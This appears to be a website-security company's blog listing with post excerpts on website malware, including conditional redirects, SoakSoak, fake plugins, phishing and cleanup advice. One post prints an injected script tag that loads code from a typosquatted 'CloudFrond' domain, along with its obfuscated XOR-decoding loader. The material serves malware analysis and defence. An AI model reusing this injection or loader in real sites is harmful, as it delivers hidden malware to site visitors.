Why A Free Obfuscator Is Not Always Free.

We all love our code but some of us love it so much that we don’t want anyone else to read or understand it. When you think about it, that’s understandable – hours and hours of hard dev work, days of testing and weeks (months?, years?) of fixing bugs and after all of this, someone steals, changes or modifies your hard work.

To address these concerns, many developers will obfuscate their code.

Read More

Analyzing Malicious Redirects in the IP.Board CMS

Although the majority of our posts describe WordPress and Joomla attacks (no wonder, given their market-share), there are still attacks that target smaller CMS’s and we help clean all kinds of sites. This post will be about conditional redirects in IP.Board forums (currently #27 with 0.3% of the CMS market).

Conditional redirects

The symptoms of the problem were typical. Some (not all) visitors who clicked on Google search results were redirected to a malicious site filestore321 .com/download .php?id=hexnumber. The redirect worked only once per visitor and subsequent attempts to trigger it would fail.

Read More

Bogus Mobile-Shortcuts WordPress Plugin Injects SEO Spam

Here at Sucuri we see countless cases of SEO spam where a website is compromised in order to spread pharmaceutical advertisements or backlinks to sites selling luxury goods. Most of the time this involves injecting hundreds of spam links into the site’s database but in this case a deceptive, fake plugin called mobile-shortcuts was able to be a bit more discreet. Below I go over the process by which this SEO spam injection was uncovered and identified.

Site (SEO Spam) Unseen

Recently I came across a website displaying a (BlackHat) SEO spam warning – pretty typical in terms of what we see day to day:


Malicious Code Warning – via SiteCheck by Sucuri

Our first analysis of the site cleared quite a few backdoors and a few known hack tools but, even so, this SEO spam persisted.

Read More

Websites Compromised with CloudFrond Injection

If you haven’t already noticed, we spent a good deal of time scraping the bottom of the interweb barrel. It’s dirty work, but someone has to do it. I’m not going to lie though, to us it’s fascinating digging up little nuggets daily, understanding how attackers think and uncovering the latest trends. Besides, it gives us countless opportunities to share those with you.

What we find most fascinating are those instance in which we find suspicious payloads where we have to tried to connect the dots. They don’t necessarily do anything malicious at the time we check, but they have, for lack of a better word, great potential. Granted, great potential for the attacker and devastating impacts for the user.

A good example of this is the following payload:

<!-- [if IE]><script type="text/javascript" src="hxxp://cloudfrond.org/golden.phtml"></script> <![endif]-->

Looks good, right? CloudFrond is a valid service, must be a false alarm..

Ah, wait, I’m confusing it with CloudFront, Amazon’s CDN web service. Of course, I know all you hard core techie’s are laughing, thinking.. of course we knew that, I assure you though, endusers and many webmasters will not be so quick to the gun. Think back to the case on gogle apis. I did do a check to see if it would work if the domain was correct, but there’s no webpage under cloudfront.org.

The Payload

Next, we take a peak at what the script is loading (edited to remove payload):

/*jskdljgdlkfjgdlkfg*/XJHNOs=print;rNjoDPv=String;RlH=rNjoDPv["fromCharCode"];crgLMK=parseInt;utO=function(a,b){return a.charAt(b);};var dOK='';var Glg='7d3d099208132cbb18d70636c524b94077a6e879d602dbfa0813ff71fd18bf53005c3a50932616ee71ad68bf114f9b6349e5431abc4509b7ad5e054778acbad4c34806e724b3eb7913224c745465249d8d6456f5b3442031ce9422be75f678e7b0c63fe25b3ad7a0c2935b2338079d55a1a972dafc0a1cfdf32f6151017843c3fba4e33a0c11517839376a3372772d557b98';var SUTbVRi='733b2ab628364cd076b5755fae4e9c281aca9319b45db58b6f82dc199e6ee17a0f5a1c75b80939d20ca5669f3270bb486d842273e07923d4cf2c696c16c7deb3bd0c63d1088dcc54312264487d5e49e07b207a5873a87d2b8f5cd181ca03294f089b6e230f52da53be966b2f297a330a4bb6afb3b15c954b76332b488da0a20766b9a9e0a23c1cbc7c856413a6be76669b1dbcd66acdb32aaa0d8f2bceafc65166dc84b91c8c652e79485c7575a56cd97c2cb91fa8b56e483f2c23dedf0aaf54cb5784902e6d68a16357823008e3300fd1b6d1b5c4b20d075309a66d667eb9a90e38d81448204db97e8d070a7d1c3012562e4b261ddb6729873cc415c4a90e431eabaf152c50b5';var w=0x0+0;for(var i=0;i<(Glg.length/2);i++){dOK+=RlH(crgLMK(utO(Glg,w)+utO(Glg,w+1),0x8+8)^crgLMK(utO(SUTbVRi,w)+utO(SUTbVRi,w+1),0x0F+1));w+=2;}XJHNOs(dOK,96);

It is a custom encoded script which loads differently every time you access, also known as a conditional payload. In fact, if you access it using Internet Explorer it just changes the variables, but if you use any other browser or user-agent, everything changes and the output is broken, like this:

Sucuri - CloudFrond Jumpled Payload

Using the right browser we were able to decode it, its definitely suspicious, but no harmful payload was delivered at the time. Here’s the traffic it generated:

Sucuri - CloudFrond Payload Delivered

It loaded a Google page on a 1×1 pixel iframe and then loaded the next function of itself. However this function is returning a 404 Not found message. Probably the payload is not available or they had it disabled.

We see two main functions inside the code:

1 – iFrame Creation

Sucuri - CloudFrond Payload iFrame Creation

2 – The main payload, which also uses the same encoding to hide the URL which will be used in the iframe.

Sucuri - CloudFrond Main Payload

Understanding Intentions

I would venture to say that there are two different things at play here:

1 – The CloudFrond campaign is just getting started, attackers are simply setting their injections in place. This would explain why the injection is pulling empty payloads. This is also a good way to avoid detection, kill the payload until you have your web of infected sites ready to go.

2 – The attackers are in fact trying to confuse webmasters by abusing our trust in trusted sources, i.e., Amazon’s CloudFront. If there is one thing we have learned in the years of doing this work, half the webmaster don’t really know what code and service their website ingests, that’s on the developer, they’re simply responsible for maintaining it. This is where the breakdown begins, and the vulnerability that attackers look to exploit.

At the moment, the CloudFrond domain is not being blacklisted by anyone, most likely because it’s not technically distributing true malware. But, it’s definitely a perfect example of how we can’t be depending on exact injections, but rather leverage a concept known as Indicators of Compromise (IoC). This is why we leverage IoC in our research and it’s the foundation from which some of our tools, like SiteCheck – Free Website Scanner, are built on.


We will keep monitoring to see if it changes its behavior.

SoakSoak: Payload Analysis – Evolution of Compromised Sites – IE 11

Thousands of WordPress sites have been hit by the SoakSoak attack lately. At this moment we know quite a lot about it; it uses the RevSlider vulnerability as a point of penetration, then uploads a backdoor and infects all websites that share the same server account. This means websites that don’t use the RevSlider plugin can be infected too. The visitor-facing part of the infection consists of these two files:

  • wp-includes/js/swfobject.js — hackers append it with an encrypted code that loads a malicious script from hxxp://soaksoak . ru/xteas/code (thus SoakSoak).
  • wp-includes/template-loader.php — in this file, hackers add code that makes WordPress load the infected swobject.js on every page.

However, it’s not always SoakSoak and not always just two files. On some sites we see a variation of this malware.

Read More

SoakSoak Malware Compromises 100,000+ WordPress Websites

This Sunday has started with a bang. Google has blacklisted over 11,000 domains with this latest malware campaign from SoakSoak.ru:

Google Blacklisting - SoakSoak.ru

Google Blacklisting – SoakSoak.ru

Our analysis is showing impacts in the order of 100’s of thousands of WordPress specific websites. We cannot confirm the exact vector, but preliminary analysis is showing correlation with the Revslider vulnerability we reported a few months back.

Read More

Website Malware Removal: Phishing

As we continue on our Malware Removal series we turn our attention to the increasing threat of Phishing infections.

Just like a fisherman casts and reels with his fishing rod, a “phisher-man” will try their luck baiting users with fake pages, often in the form of login pages. These copied website pages are cast into infected websites with the hope that some users will bite, and get reeled into giving away their secret data. Wielding the web development and scripting knowledge necessary to make forms that look convincingly realistic, hackers lure unsuspecting users into entering their credentials on the imitated page.

Read More

RSS Reveals Malware Injections

There are multiple different ways to detect invisible malware on a website:

  • You can scrutinize the HTML code of web pages.
  • Use external scanners like SiteCheck or UnmaskParasites.
  • Get alerts from anti-viruses or search engines (both in search results and via their Webmaster Tools).
  • Try to open web pages with different User-Agents and check for changes.
  • Sometimes it is even helpful to open a page using a script blocker (the disabled scripts may hide spammy links injected into web pages).

It’s not a definitive list and sometimes we see some interesting ways that malware reveals itself. This time I’ll show how a fake WordPress plugin that was injecting invisible links to a porn site unmasked itself in via RSS feeds.

Read More

The Art of Website Malware Removal – The Basics

When talking about defense against malicious hacks, the attack vector is a common topic for Information Security (InfoSec) professionals. The primary concern is to understand the anatomy of the attack and prevent it from happening again. However, there is a less glamorous task that must take place once an attack vector is exploited; that is malware removal (a.k.a., cleaning up the mess).

The task of cleaning, removing, malware often falls on your shoulders as the website owner / administrator.

While unfortunate and frustrating, malware infections greet us like flat tire or a burst water pipe in the middle of the night. It’s never expected, it’s always while you are sleeping and it’s impacts are felt greatly. They hurt search engine rankings (i.e., SEO), spread malware to users, introduce branding issue, cause websites to be shutdown and a slew of other less than pleasant experiences. The important thing to note though, is that like other problems that surprise us in life, malware infections must be dealt with quickly and correctly. You cannot drive your daily commute on a flat tire, nor can you operate a website that is infected with malware.

Malware needs to be removed as soon as possible before the consequences begin to amplify themselves and their impacts.

Four Common Malware Families Affecting Websites

Like the real-life pests and diseases that they are named for, worms, viruses, and other types of cyber-menaces that have earned metaphorical aliases have many varieties, purposes, and ways to deal with different types of malware. The treatment of one kind of skin infection may have no effect when applied to another, and attempting to remove a hornet nest with the same caution as a bird nest would lead to disastrous results. The scenario is virtually the same when cleaning an infected website.

Due to the multitude of technologies, languages, frameworks and tools, code on the web can be as diverse as human culture itself. This brings about millions of possibilities to achieve very similar goals in software development. Malware takes on this model, and rears it’s ugly head in many different forms, functioning to serve many different purposes.

1. Blackhat SEO Spam Injections

Everybody who reads this blog has seen it before: a website with some very out of place looking advertisements, that are usually of the pharmaceutical, pornographic, knock-off designer brand or fast-money lending nature. These websites have been hit by a criminal user looking to feed off of the website’s traffic in order to advertise for products and services that would normally be very restricted or banned by most hosting policies. Using the victim website as a billboard, the hacker earns commission based income off of the number of clicks or forced redirects that are generated because of the injected malware.

The malicious code that causes injected spam content can be structured in several ways, placed in many locations, or be encoded in a multitude of ways to appear like normal software. Because of this, it is very difficult to have an across-the-board detection method for all types of SEO spam. There are many varieties in the wild that infect websites every day. Furthermore, some infections are scripts can activate based on time or events on your site. These can constantly update posts and pages to display junk or redirect users to affiliate pages, even after you’ve done the work to get rid of it. This can cause a major strain on cleanup, so the best solution is to be prepared with a full backup. By updating to a recent clean version from before a successful attack, website owners can go back in time to a moment before the hack took place, and update their security measures to make sure their content is not overshadowed by blackhat SEO spam.

2. Phishing

Little do many webmasters know, but millions of websites across the internet have pages that definitely should not be there. These hidden pages are home to code that is crafted to resemble other websites on the Internet, like BofA.com, Amazon.com, eBay.com, Hotmail, Gmail, Facebook, and many others.

The hackers that put these pages on your site are using them to trick other users to mistakenly put their credentials into a form controlled by the hackers, instead of the official website they think they are sending their password to. This is the reason those policy memos from your bank are always telling you to thoroughly check the links you click when going to manage your finances, or that you should never click a link to go to your bank account from your email. Those links may actually be under the control of someone looking to steal your information, to then steal your money, from pages hosted on a website of an unknowing person, not actually looking to help criminals steal usernames and passwords.

3. Drive-By Downloads

Malware can be difficult to detect, and often employs social engineering tactics, or methods that trick users into playing into the clutches of the attacker. Forms, pop-ups, ads and other site functions can be compromised to force a user to click on something other than intended, or answer a question where the secret answer is actually Yes, I would like to download that .exe file.

These infections, called Drive-By Downloads, are incredibly dangerous to end-users, as they allow attackers to escalate their control from an infected website, to the potential administrative access of any computer that accesses that website. Once the malicious payload has been delivered to the victim user’s machine, it may activate automatically or wait to be activated by some other method before scraping the user’s machine of sensitive information, and sending that along with remote access privileges to a waiting attacker.

4. Backdoors

While some infectious files are meant to actively perform tasks, create spam or attack visitors, other types are meant to lay in wait, and appear only to the hackers that know they are there. These are called backdoor infections. These can lead to large scale attacks by allowing the attacker to build up a number of websites to use as attack surfaces. They can look very different in separate cases, but often have a similar function at the end of their task list: to provide the hacker with the access needed to control the website or server at any chosen time.

Backdoors can serve multiple purposes, ranging from being able to reinfect websites after cleanup, to linking the targeted site to a network of other sites used in DDoS attacks, or massive spam mail campaigns.

Scrubbing Away the Hacker Residue

Learning to deal with each type of malware infection individually is quite challenging at a technical level, but having a plan to get back to normal under any circumstance is important nonetheless.

If detection fails, a keen eye is needed to analyze website content, functionality and code for any signs of intrusion. Once a thread is noticed, it must be followed to determine where in the files or database that the malware located, so that it can be removed.

Once the code showing the infection (i.e., symptom) is removed you must ensure that you go through the rest of the website and remove / repair any backdoors or potential attack vectors. In further efforts to prevent reinfection, all software should be updated fully to minimize the chance of known vulnerabilities being exploited, and all passwords changed, to eliminate the risk that they were stolen during the attack.

It can always be assumed that a stable backup from before a time where malicious files or database entries existed on the server will solve almost any problem. It is therefore, extremely important to maintain backups that are scheduled to be made on a timeframe that will suit to overwrite the infected aftermath of a website. We’ve spoken about backups at length before, but it’s a necessity.

Contrary to popular belief, malware removal is not a Do It Yourself (DIY) project. It has affected the brightest developers and security professionals; it’s time consuming, and can be the cause of many restless nights and days. If you find yourself in this predicament know that there are professionals out there that specialize in this work.

Remember, website infections are like Icebergs, they only display 10% of the problem.

Malicious iframe Injector Found in Adobe Flash File (.SWF)

Finding malware in Adobe Flash files (.swf) is nothing new, but it usually affects personal computers, not servers. Typically, a hidden iframe is used to drop a binary browser exploit with .SWF files, infecting the client machine.

This time we saw the opposite, where a binary .SWF file injects an invisible iframe. This is an example of a malicious hidden iframe injector written in Flash. This is also awesome proof of what I said in a recent post: If a piece of malware can be written in one language, it will be written in others, sooner or later. Tweet: If a piece of malware can be written in one language, it will be written in others, sooner or later @sucuri_security http://ctt.ec/ba1La+

Looks like I was right!

Read More